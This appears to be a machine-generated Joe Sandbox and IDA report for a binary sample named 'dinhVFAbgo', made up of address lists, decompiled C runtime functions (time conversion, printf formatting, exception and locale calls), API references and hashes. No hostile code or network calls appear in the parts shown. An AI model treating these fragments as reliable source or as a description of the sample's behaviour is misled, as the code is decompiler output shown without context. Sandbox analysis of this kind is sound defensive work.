0x00000000
0x00cb4394
0x00cb430e
0x00cb4311
0x00cb4316
0x00cb4319
0x00cb4320
0x00cb4320
0x00cb4323
0x00cb4326
0x00cb4329
0x00cb4329
0x00cb432c
0x00cb432f
0x00cb4406
0x00cb4406
0x00cb4885
0x00cb4887
0x00cb4887
0x00cb4888
0x00cb4888
0x00cb488d
0x00cb488f
0x00cb488f
0x00000000
0x00cb488d
0x00cb4335
0x00000000
0x00cb43b5
0x00000000
0x00000000
0x00cb43d8
0x00000000
0x00000000
0x00cb440e
0x00cb4411
0x00cb4413
0x00cb4413
0x00cb4416
0x00cb4417
0x00cb441a
0x00cb441e
0x00000000
0x00000000
0x00cb4435
0x00cb443b
0x00000000
0x00000000
0x00cb4442
0x00cb43b6
0x00cb43b6
0x00cb43b8
0x00cb43be
0x00cb43c0
0x00000000
0x00000000
0x00cb444a
0x00cb4452
0x00cb4455
0x00cb445d
0x00cb4461
0x00cb4464
0x00cb4467
0x00cb446c
0x00cb4476
0x00cb4479
0x00cb447d
0x00cb447f
0x00cb4483
0x00cb4489
0x00cb448c
0x00cb4491
0x00cb4493
0x00cb4495
0x00cb4498
0x00cb449a
0x00cb449c
0x00cb44a5
0x00cb44aa
0x00cb44ac
0x00cb44ae
0x00cb44ae
0x00cb44ac
0x00cb44b1
0x00cb44b1
0x00cb44b7
0x00cb44ba
0x00cb44bc
0x00cb44bd
0x00cb44c0
0x00cb44c1
0x00cb44c7
0x00cb44c9
0x00cb44cb
0x00cb44cf
0x00cb44d5
0x00cb44d5
0x00cb44d5
0x00cb44dc
0x00cb44df
0x00000000
0x00000000
0x00cb44f1
0x00cb44f4
0x00cb44f9
0x00cb44fc
0x00cb4500
0x00cb4503
0x00cb4506
0x00cb4509
0x00cb450b
0x00cb450e
0x00cb450f
0x00cb4515
0x00cb4517
0x00cb4519
0x00cb451d
0x00cb44e4
0x00cb44e4
0x00cb44e7
0x00000000
0x00000000
0x00cb4525
0x00cb4528
0x00cb4531
0x00cb4532
0x00cb4535
0x00000000
0x00000000
0x00cb453d
0x00cb4542
0x00cb4545
0x00cb4546
0x00000000
0x00000000
0x00cb4873
0x00cb4873
0x00000000
0x00000000
0x00cb4566
0x00cb456b
0x00cb456e
0x00cb4571
0x00cb4574
0x00cb4575
0x00cb4423
0x00cb4423
0x00cb4424
0x00cb4426
0x00cb442c
0x00cb442e
0x00000000
0x00000000
0x00cb45a2
0x00000000
0x00000000
0x00cb458e
0x00000000
0x00000000
0x00cb457d
0x00cb457f
0x00cb4585
0x00cb4587
0x00000000
0x00000000
0x00cb45aa
0x00cb45af
0x00cb45b2
0x00cb45b3
0x00000000
0x00000000
0x00cb45b8
0x00cb45bb
0x00cb45bd
0x00cb45c0
0x00cb45c1
0x00cb45c2
0x00000000
0x00000000
0x00cb45c7
0x00cb45ca
0x00cb45cc
0x00cb45cc
0x00cb45cf
0x00cb45d0
0x00cb45d3
0x00000000
0x00000000
0x00cb43f1
0x00000000
0x00000000
0x00cb43dd
0x00cb43df
0x00cb43e5
0x00cb43e7
0x00000000
0x00000000
0x00cb45f3
0x00cb45f5
0x00cb45fa
0x00cb45fd
0x00cb45ff
0x00cb4602
0x00cb4603
0x00cb4604
0x00cb4607
0x00cb460a
0x00cb460a
0x00cb460a
0x00cb460d
0x00000000
0x00000000
0x00cb462e
0x00000000
0x00000000
0x00cb463c
0x00000000
0x00000000
0x00cb4643
0x00cb4646
0x00cb4648
0x00cb4648
0x00cb464b
0x00cb464c
0x00cb464d
0x00cb4650
0x00cb4654
0x00000000
0x00000000
0x00cb465f
0x00000000
0x00000000
0x00cb4669
0x00cb4662
0x00cb4662
0x00cb4633
0x00cb4633
0x00000000
0x00000000
0x00cb466e
0x00cb4673
0x00cb4676
0x00cb4677
0x00cb467a
0x00cb467e
0x00000000
0x00000000
0x00cb4685
0x00cb468b
0x00cb468e
0x00cb4691
0x00cb4694
0x00cb4697
0x00cb469c
0x00cb469d
0x00cb46a0
0x00cb460e
0x00cb460e
0x00cb4610
0x00cb4616
0x00000000
0x00000000
0x00cb461b
0x00cb4621
0x00000000
0x00000000
0x00cb46a9
0x00cb46ac
0x00cb46b5
0x00cb46b6
0x00cb46b9
0x00000000
0x00000000
0x00cb46be
0x00cb46c1
0x00cb46c4
0x00cb46c7
0x00cb46c8
0x00cb46cb
0x00cb46ce
0x00cb46d1
0x00cb46e7
0x00cb46e8
0x00000000
0x00cb46e8
0x00cb46db
0x00cb46dc
0x00cb46df
0x00000000
0x00000000
0x00cb46ee
0x00cb4591
0x00cb4591
0x00cb4593
0x00cb4599
0x00cb459b
0x00000000
0x00000000
0x00cb471b
0x00cb471e
0x00cb4720
0x00cb4723
0x00cb4729
0x00cb472b
0x00000000
0x00000000
0x00cb439c
0x00cb439f
0x00cb43a2
0x00cb43a5
0x00cb43a6
0x00cb43a7
0x00000000
0x00000000
0x00cb46f6
0x00cb46f9
0x00cb46fb
0x00cb46fe
0x00cb4701
0x00cb4702
0x00cb4659
0x00cb4659
0x00000000
0x00000000
0x00cb470a
0x00cb470d
0x00cb4710
0x00cb4713
0x00cb4714
0x00cb4715
0x00cb45d4
0x00cb45d4
0x00cb45d7
0x00cb45d7
0x00cb45d9
0x00cb45df
0x00cb45e1
0x00cb45e1
0x00000000
0x00000000
0x00cb4732
0x00cb4735
0x00cb4738
0x00cb473b
0x00cb473c
0x00cb473d
0x00cb473e
0x00cb4743
0x00cb4746
0x00cb4747
0x00cb474a
0x00cb474c
0x00cb474d
0x00cb4753
0x00cb4755
0x00cb4757
0x00cb4759
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb4764
0x00cb4767
0x00cb476a
0x00cb476d
0x00cb476e
0x00cb476f
0x00cb4770
0x00cb4775
0x00cb4778
0x00cb4779
0x00cb477c
0x00cb477e
0x00cb477f
0x00cb4785
0x00cb4787
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb478e
0x00cb4790
0x00cb4796
0x00cb4798
0x00cb479a
0x00cb479c
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb47aa
0x00cb43f6
0x00cb43f6
0x00cb43f7
0x00cb43f7
0x00000000
0x00000000
0x00cb47b7
0x00cb47bc
0x00cb4876
0x00cb4876
0x00000000
0x00000000
0x00cb47c2
0x00cb47c8
0x00000000
0x00000000
0x00cb47d2
0x00cb47d5
0x00cb47d7
0x00cb47da
0x00cb47db
0x00cb47de
0x00cb47e0
0x00cb47e6
0x00cb47e6
0x00cb47eb
0x00cb47ec
0x00cb47f0
0x00000000
0x00000000
0x00cb4807
0x00cb480a
0x00cb480d
0x00000000
0x00000000
0x00cb4815
0x00cb4818
0x00cb481b
0x00cb481e
0x00cb481f
0x00cb4820
0x00cb4821
0x00cb4826
0x00cb4829
0x00cb482a
0x00cb47f5
0x00cb47f5
0x00000000
0x00000000
0x00cb482f
0x00cb4832
0x00cb4835
0x00cb4838
0x00cb4839
0x00cb483a
0x00cb483b
0x00cb4840
0x00cb4843
0x00cb4844
0x00cb47f6
0x00cb47f6
0x00cb47f8
0x00cb47fe
0x00cb4800
0x00cb420f
0x00cb4211
0x00cb4212
0x00000000
0x00000000
0x00cb43c7
0x00cb43cd
0x00000000
0x00000000
0x00cb4551
0x00cb4554
0x00cb4558
0x00cb455d
0x00cb455d
0x00cb43fa
0x00cb43fa
0x00cb43fc
0x00cb4402
0x00cb4404
0x00000000
0x00000000
0x00cb4847
0x00cb484a
0x00cb484d
0x00cb4850
0x00cb4851
0x00cb43d2
0x00cb43d2
0x00cb4879
0x00cb487b
0x00cb4883
0x00000000
0x00000000
0x00cb433c
0x00cb433c
0x00cb4341
0x00cb4341
0x00cb4349
0x00cb434b
0x00cb4372
0x00cb4372
0x00cb4374
0x00000000
0x00000000
0x00cb4353
0x00cb4355
0x00cb485e
0x00cb4861
0x00cb4866
0x00cb4869
0x00cb4870
0x00cb4870
0x00000000
0x00cb4870
0x00cb4364
0x00cb4368
0x00cb436d
0x00cb436f
0x00cb436f
0x00000000
0x00cb4372
0x00cb42ef
0x00cb42af
0x00cb42b2
0x00000000
0x00000000
0x00cb42b9
0x00cb42bc
0x00cb42c1
0x00cb42c4
0x00cb42cb
0x00cb42cd
0x00000000
0x00000000
0x00cb42d3
0x00cb42d9
0x00000000
0x00000000
0x00000000
0x00cb42db
0x00cb41ed
0x00cb41f0
0x00cb420b
0x00cb420d
0x00cb420d
0x00000000
0x00000000
0x00000000
0x00cb420d
0x00cb41f2
0x00cb41f5
0x00000000
0x00000000
0x00cb41f7
0x00cb41fa
0x00cb41fc
0x00000000
0x00000000
0x00cb41fe
0x00000000
0x00cb41fe
0x00cb4193
0x00cb4197
0x00000000
0x00000000
0x00cb4199
0x00cb419e
0x00cb41a7
0x00cb41a7
0x00cb41ac
0x00cb41b5
0x00cb41ba
0x00cb41bd
0x00000000
0x00000000
0x00cb41bf
0x00cb41c1
0x00cb41d2
0x00cb41db
0x00cb41dd
0x00cb41df
0x00000000
0x00000000
0x00000000
0x00cb41df
0x00cb41ae
0x00cb41b3
0x00000000
0x00000000
0x00000000
0x00cb41b3
0x00cb41a0
0x00cb41a5
0x00000000
0x00000000
0x00000000
0x00cb41a5
0x00cb4173
0x00cb4178
0x00cb417a
0x00000000
0x00000000
0x00cb4180
0x00cb4180
0x00cb4183
0x00cb4186
0x00000000
0x00cb4186
0x00cb415c
0x00000000
0x00cb415c
0x00cb4117
0x00cb411a
0x00cb411d
0x00000000
0x00000000
0x00cb4135
0x00cb413d
0x00cb413f
0x00cb4141
0x00000000
0x00000000
0x00000000
0x00cb4147
0x00cb40ce
0x00cb40d2
0x00000000
0x00cb40d8
0x00cb40dc
0x00cb40e1
0x00cb40e3
0x00cb410b
0x00cb40e5
0x00cb40e5
0x00cb40e8
0x00cb40eb
0x00cb40ed
0x00cb40f8
0x00cb4101
0x00cb4101
0x00cb4103
0x00cb4103
0x00000000
0x00cb40e3
0x00cb40d2
0x00cb40ac
0x00cb40b8
0x00000000
0x00cb40be
0x00000000
0x00cb40be

APIs

__EH_prolog3.LIBCMT ref: 00CB4079
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,00000000), ref: 00CB4269

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3RedrawWindow
String ID:
API String ID: 474685049-0
Opcode ID: fc4bd317347c725de8e0afc3f3776470410907e572a92c96e07a0f0a80127b48
Instruction ID: 5b968553285a8d5e6a1f6f25fd0c17b561a897382465a94f789a847e8004db42
Opcode Fuzzy Hash: fc4bd317347c725de8e0afc3f3776470410907e572a92c96e07a0f0a80127b48
Instruction Fuzzy Hash: BFE15A30A082199FDF19DF65C884BFE77B6AF48310F148059F825AB292DB35EE41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DEB4A8 Relevance: 3.0, APIs: 2, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00DEB4A8(void* __ecx, signed int __edx, signed int* _a4) {
				struct _FILETIME _v12;
				signed int _t12;
				signed int _t13;
				signed int* _t16;
				signed int _t17;
				void* _t18;

				_t17 = __edx;
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v12);
				_t15 = _v12.dwHighDateTime;
				_t12 = _v12.dwLowDateTime - 0xd53e8000;
				asm("sbb ecx, 0x19db1de");
				_t18 = _v12.dwHighDateTime - 0x483f078;
				if(_t18 > 0 || _t18 >= 0 && _t12 >= 0xdd478000) {
					_t13 = _t12 | 0xffffffff;
					_t17 = _t13;
				} else {
					_t13 = E00DDD6E0(_t12, _t15, 0x989680, 0);
				}
				_t16 = _a4;
				if(_t16 != 0) {
					 *_t16 = _t13;
					_t16[1] = _t17;
					return _t13;
				}
				return _t13;
			}

0x00deb4a8
0x00deb4af
0x00deb4b6
0x00deb4bb
0x00deb4c4
0x00deb4c7
0x00deb4cc
0x00deb4d2
0x00deb4d8
0x00deb4f3
0x00deb4f6
0x00deb4e3
0x00deb4ec
0x00deb4ec
0x00deb4f8
0x00deb4fd
0x00deb4ff
0x00deb501
0x00000000
0x00deb501
0x00deb505

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CA746F,00000000,?,00CA7D3B,?), ref: 00DEB4BB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DEB4EC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: e1afa0b286711ab3474823d689506b1c65def72506870ea9b4e1ce82aa04c51c
Instruction ID: 9f19bc60558571cd66c7b7695f484e2c85b78219d73a0dfb00e54fd84bc953bf
Opcode Fuzzy Hash: e1afa0b286711ab3474823d689506b1c65def72506870ea9b4e1ce82aa04c51c
Instruction Fuzzy Hash: 77F0F670500244BFDB14EF6AC845BAE7AA8FB40329F24864AA402E7180D770EA008760

Uniqueness

Uniqueness Score: -1.00%

Function 00DE44D2 Relevance: 2.7, Strings: 2, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00DE44D2(intOrPtr* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short _v24;
				void* __ebx;
				void* __esi;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed int _t62;
				signed char _t65;
				signed char _t67;
				signed int _t68;
				short _t70;
				void* _t71;
				signed char _t77;
				signed char _t80;
				void* _t85;
				void* _t86;
				signed char _t88;
				signed char _t90;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t99;
				unsigned int _t100;
				signed int _t101;
				void* _t104;
				void* _t106;
				signed int _t110;
				unsigned int _t112;
				signed int* _t114;
				signed char _t115;
				signed int _t123;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;
				void* _t134;
				void* _t135;

				_t126 = __edi;
				_t57 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t57 ^ _t131;
				_t130 = __ecx;
				_t99 = 0;
				_t123 = 0x41;
				_t59 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t134 = _t59 - 0x64;
				if(_t134 > 0) {
					__eflags = _t59 - 0x70;
					if(__eflags > 0) {
						_t60 = _t59 - 0x73;
						__eflags = _t60;
						if(_t60 == 0) {
							L9:
							_t61 = E00DE507A(_t130);
							L10:
							if(_t61 != 0) {
								__eflags =  *((intOrPtr*)(_t130 + 0x30)) - _t99;
								if( *((intOrPtr*)(_t130 + 0x30)) != _t99) {
									L69:
									_t62 = 1;
									L70:
									return E00DDCBCE(_t62, _t99, _v8 ^ _t131, _t123, _t126, _t130);
								}
								_t110 = _t99;
								_v16 = _t99;
								_v12 = _t99;
								_t100 =  *(_t130 + 0x20);
								_push(_t126);
								_v20 = _t110;
								_t65 = _t100 >> 4;
								_t127 = 0x20;
								__eflags = 1 & _t65;
								if((1 & _t65) == 0) {
									L45:
									_t123 =  *(_t130 + 0x32) & 0x0000ffff;
									_t128 = 0x78;
									__eflags = _t123 - _t128;
									if(_t123 == _t128) {
										L47:
										_t67 = _t100 >> 5;
										__eflags = _t67 & 0x00000001;
										if((_t67 & 0x00000001) == 0) {
											L49:
											_t101 = 0;
											__eflags = 0;
											L50:
											__eflags = _t123 - 0x61;
											if(_t123 == 0x61) {
												L53:
												_t68 = 1;
												L54:
												_v24 = 0x30;
												__eflags = _t101;
												if(_t101 != 0) {
													L56:
													 *((short*)(_t131 + _t110 * 2 - 0xc)) = _v24;
													_t70 = 0x58;
													__eflags = _t123 - _t70;
													if(_t123 == _t70) {
														L58:
														_t128 = _t70;
														L59:
														 *((short*)(_t131 + _t110 * 2 - 0xa)) = _t128;
														_t110 = _t110 + 2;
														__eflags = _t110;
														_v20 = _t110;
														L60:
														_t71 = _t130 + 0x18;
														_t129 = _t130 + 0x448;
														_t99 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t130 + 0x38)) - _t110;
														__eflags =  *(_t130 + 0x20) & 0x0000000c;
														if(( *(_t130 + 0x20) & 0x0000000c) == 0) {
															E00DE2F29(_t129, 0x20, _t99, _t71);
															_t110 = _v20;
															_t132 = _t132 + 0x10;
														}
														_push(_t130 + 0xc);
														E00DE54CD(_t129,  &_v16, _t110, _t130 + 0x18);
														_t112 =  *(_t130 + 0x20);
														_t77 = _t112 >> 3;
														__eflags = _t77 & 0x00000001;
														if((_t77 & 0x00000001) != 0) {
															_t115 = _t112 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E00DE2F29(_t129, _v24, _t99, _t130 + 0x18);
																_t132 = _t132 + 0x10;
															}
														}
														E00DE5414(_t130, _t123, 0);
														_t114 = _t130 + 0x18;
														__eflags =  *_t114;
														if( *_t114 >= 0) {
															_t80 =  *(_t130 + 0x20) >> 2;
															__eflags = _t80 & 0x00000001;
															if((_t80 & 0x00000001) != 0) {
																E00DE2F29(_t129, 0x20, _t99, _t114);
															}
														}
														_pop(_t126);
														goto L69;
													}
													_t104 = 0x41;
													__eflags = _t123 - _t104;
													if(_t123 != _t104) {
														goto L59;
													}
													goto L58;
												}
												__eflags = _t68;
												if(_t68 == 0) {
													goto L60;
												}
												goto L56;
											}
											_t85 = 0x41;
											__eflags = _t123 - _t85;
											if(_t123 == _t85) {
												goto L53;
											}
											_t68 = 0;
											goto L54;
										}
										_t101 = 1;
										goto L50;
									}
									_t86 = 0x58;
									__eflags = _t123 - _t86;
									if(_t123 != _t86) {
										goto L49;
									}
									goto L47;
								}
								_t88 = _t100 >> 6;
								__eflags = 1 & _t88;
								if((1 & _t88) == 0) {
									__eflags = 1 & _t100;
									if((1 & _t100) == 0) {
										_t90 = _t100 >> 1;
										__eflags = 1 & _t90;
										if((1 & _t90) != 0) {
											_v16 = _t127;
											_t110 = 1;
											_v20 = 1;
										}
										goto L45;
									}
									_push(0x2b);
									L42:
									_pop(_t91);
									_t110 = 1;
									_v16 = _t91;
									_v20 = 1;
									goto L45;
								}
								_push(0x2d);
								goto L42;
							}
							L11:
							_t62 = 0;
							goto L70;
						}
						_t93 = _t60;
						__eflags = _t93;
						if(__eflags == 0) {
							L28:
							_push(_t99);
							_push(0xa);
							L29:
							_t61 = E00DE4DD2(_t130, __eflags);
							goto L10;
						}
						__eflags = _t93 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t61 = E00DE4FF1(__ecx);
						goto L10;
					}
					__eflags = _t59 - 0x67;
					if(_t59 <= 0x67) {
						L30:
						_t61 = E00DE49F1(_t130);
						goto L10;
					}
					__eflags = _t59 - 0x69;
					if(_t59 == 0x69) {
						L27:
						_t3 = _t130 + 0x20;
						 *_t3 =  *(_t130 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t59 - 0x6e;
					if(_t59 == 0x6e) {
						_t61 = E00DE4F27(__ecx, _t123);
						goto L10;
					}
					__eflags = _t59 - 0x6f;
					if(_t59 != 0x6f) {
						goto L11;
					}
					_t61 = E00DE4FBA(__ecx);
					goto L10;
				}
				if(_t134 == 0) {
					goto L27;
				}
				_t135 = _t59 - _t106;
				if(_t135 > 0) {
					_t95 = _t59 - 0x5a;
					__eflags = _t95;
					if(_t95 == 0) {
						_t61 = E00DE4846(__ecx);
						goto L10;
					}
					_t96 = _t95 - 7;
					__eflags = _t96;
					if(_t96 == 0) {
						goto L30;
					}
					__eflags = _t96;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t61 = E00DE4BEB(_t130, _t123, __eflags, _t99);
					goto L10;
				}
				if(_t135 == 0) {
					_push(1);
					goto L13;
				}
				if(_t59 == _t123) {
					goto L30;
				}
				if(_t59 == 0x43) {
					goto L17;
				}
				if(_t59 <= 0x44) {
					goto L11;
				}
				if(_t59 <= 0x47) {
					goto L30;
				}
				if(_t59 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00de44d2
0x00de44da
0x00de44e1
0x00de44e6
0x00de44e8
0x00de44ec
0x00de44ef
0x00de44f3
0x00de44f4
0x00de44f7
0x00de4564
0x00de4567
0x00de45b6
0x00de45b6
0x00de45b9
0x00de4525
0x00de4527
0x00de452c
0x00de452e
0x00de45d4
0x00de45d7
0x00de471f
0x00de471f
0x00de4721
0x00de472e
0x00de472e
0x00de45dd
0x00de45df
0x00de45e2
0x00de45e8
0x00de45ec
0x00de45ef
0x00de45f2
0x00de45f7
0x00de45f8
0x00de45fa
0x00de462c
0x00de462c
0x00de4632
0x00de4633
0x00de4636
0x00de4640
0x00de4642
0x00de4645
0x00de4647
0x00de464d
0x00de464d
0x00de464d
0x00de464f
0x00de464f
0x00de4652
0x00de4660
0x00de4660
0x00de4662
0x00de4662
0x00de4669
0x00de466b
0x00de4671
0x00de4676
0x00de467b
0x00de467c
0x00de467f
0x00de4689
0x00de4689
0x00de468b
0x00de468b
0x00de4690
0x00de4690
0x00de4693
0x00de4696
0x00de4699
0x00de469f
0x00de46a5
0x00de46a7
0x00de46ab
0x00de46b2
0x00de46b7
0x00de46ba
0x00de46ba
0x00de46c0
0x00de46cc
0x00de46d1
0x00de46d6
0x00de46d9
0x00de46db
0x00de46dd
0x00de46e0
0x00de46e3
0x00de46ee
0x00de46f3
0x00de46f3
0x00de46e3
0x00de46fa
0x00de46ff
0x00de4702
0x00de4705
0x00de470a
0x00de470d
0x00de470f
0x00de4716
0x00de471b
0x00de470f
0x00de471e
0x00000000
0x00de471e
0x00de4683
0x00de4684
0x00de4687
0x00000000
0x00000000
0x00000000
0x00de4687
0x00de466d
0x00de466f
0x00000000
0x00000000
0x00000000
0x00de466f
0x00de4656
0x00de4657
0x00de465a
0x00000000
0x00000000
0x00de465c
0x00000000
0x00de465c
0x00de4649
0x00000000
0x00de4649
0x00de463a
0x00de463b
0x00de463e
0x00000000
0x00000000
0x00000000
0x00de463e
0x00de45fe
0x00de4601
0x00de4603
0x00de4609
0x00de460b
0x00de461d
0x00de461f
0x00de4621
0x00de4623
0x00de4627
0x00de4629
0x00de4629
0x00000000
0x00de4621
0x00de460d
0x00de460f
0x00de460f
0x00de4610
0x00de4612
0x00de4616
0x00000000
0x00de4616
0x00de4605
0x00000000
0x00de4605
0x00de4534
0x00de4534
0x00000000
0x00de4534
0x00de45c0
0x00de45c0
0x00de45c3
0x00de4595
0x00de4595
0x00de4596
0x00de4598
0x00de459a
0x00000000
0x00de459a
0x00de45c5
0x00de45c8
0x00000000
0x00000000
0x00de45ce
0x00de453d
0x00de453d
0x00000000
0x00de453d
0x00de4569
0x00de45ac
0x00000000
0x00de45ac
0x00de456b
0x00de456e
0x00de45a1
0x00de45a3
0x00000000
0x00de45a3
0x00de4570
0x00de4573
0x00de4591
0x00de4591
0x00de4591
0x00de4591
0x00000000
0x00de4591
0x00de4575
0x00de4578
0x00de458a
0x00000000
0x00de458a
0x00de457a
0x00de457d
0x00000000
0x00000000
0x00de4581
0x00000000
0x00de4581
0x00de44f9
0x00000000
0x00000000
0x00de44ff
0x00de4501
0x00de4541
0x00de4541
0x00de4544
0x00de455d
0x00000000
0x00de455d
0x00de4546
0x00de4546
0x00de4549
0x00000000
0x00000000
0x00de454c
0x00de454f
0x00000000
0x00000000
0x00de4551
0x00de4554
0x00000000
0x00de4554
0x00de4503
0x00de453b
0x00000000
0x00de453b
0x00de4507
0x00000000
0x00000000
0x00de4510
0x00000000
0x00000000
0x00de4515
0x00000000
0x00000000
0x00de451a
0x00000000
0x00000000
0x00de4523
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00DE4662
Net, xrefs: 00DE45EC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: 0$Net
API String ID: 0-2109079039
Opcode ID: b5d0c27e8239a1af81c8f077beca9b37ac35a359eac9807719176851e80e05b4
Instruction ID: ab7633027db2a0b280768ffa8caa935a0ca3d7baef828aac3a5d11a29e3a39aa
Opcode Fuzzy Hash: b5d0c27e8239a1af81c8f077beca9b37ac35a359eac9807719176851e80e05b4
Instruction Fuzzy Hash: FA6165706006C897DF38BA6B8891BBE73A5EF46704F5C082EE482DB281D760ED45C779

Uniqueness

Uniqueness Score: -1.00%

Function 00E01317 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E01312,?,?,00000008,?,?,00E05F1A,00000000), ref: 00E01544

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: fe79e2e517ce0ec4b5ea7f1c4be1c37a1673b316e4a40b2f2f611452e16d85e3
Instruction ID: cf64b6bb64cc01a5fe1e7f1aa175aef64d2d3134d505bfafc427ba6ff403a25e
Opcode Fuzzy Hash: fe79e2e517ce0ec4b5ea7f1c4be1c37a1673b316e4a40b2f2f611452e16d85e3
Instruction Fuzzy Hash: AEB14D31610605DFD719CF28C486BA57BE0FF45369F299698E8AADF2E1C335E981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E00364 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4B9F
Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4BD5

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E003B8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
